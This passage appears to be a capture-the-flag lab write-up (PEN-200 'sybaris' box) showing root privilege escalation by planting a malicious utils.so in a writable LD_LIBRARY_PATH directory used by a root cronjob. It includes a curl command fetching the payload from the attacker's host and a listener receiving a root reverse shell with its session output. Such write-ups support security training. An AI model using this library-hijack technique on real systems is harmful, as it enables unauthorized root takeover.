Loading a Malicious Shared Object Library with Cronjob
A system-wide root cronjob executes the log-sweeper binary every minute, and the LD_LIBRARY_PATH includes a writable directory (/usr/local/lib/dev), which allows arbitrary file placement. The log-sweeper binary is dynamically linked and attempts to load utils.so, but fails because the library is missing. Since the writable directory is in the library path, an attacker could place a malicious utils.so file there, leading to code execution with root privileges when the cronjob runs.
[pablo@sybaris /]$ curl -s http://192.168.45.218/utils.so -o /usr/local/lib/dev/utils.so ; chmod 777 /usr/local/lib/dev/utils.so
[pablo@sybaris /]$ ll /usr/local/lib/dev/
total 4.0K
0 drwxrwxrwx 2 root root 22 Mar 29 10:02 .
4.0K -rwxrwxrwx 1 pablo pablo 521 Mar 29 10:02 utils.so
0 drwxr-xr-x. 4 root root 30 Sep 7 2020 ..Delivering the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ nnc 21
listening on [any] 21 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.185.93] 42016
whoami
root
hostname
sybaris
ifconfig
/bin/sh: line 3: ifconfig: command not found
/sbin/ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.185.93 netmask 255.255.255.0 broadcast 192.168.185.255
ether 00:50:56:9e:c4:cc txqueuelen 1000 (Ethernet)
RX packets 11909 bytes 5426439 (5.1 MiB)
RX errors 0 dropped 517 overruns 0 frame 0
TX packets 2622 bytes 446573 (436.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 139 bytes 10970 (10.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 139 bytes 10970 (10.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System level compromise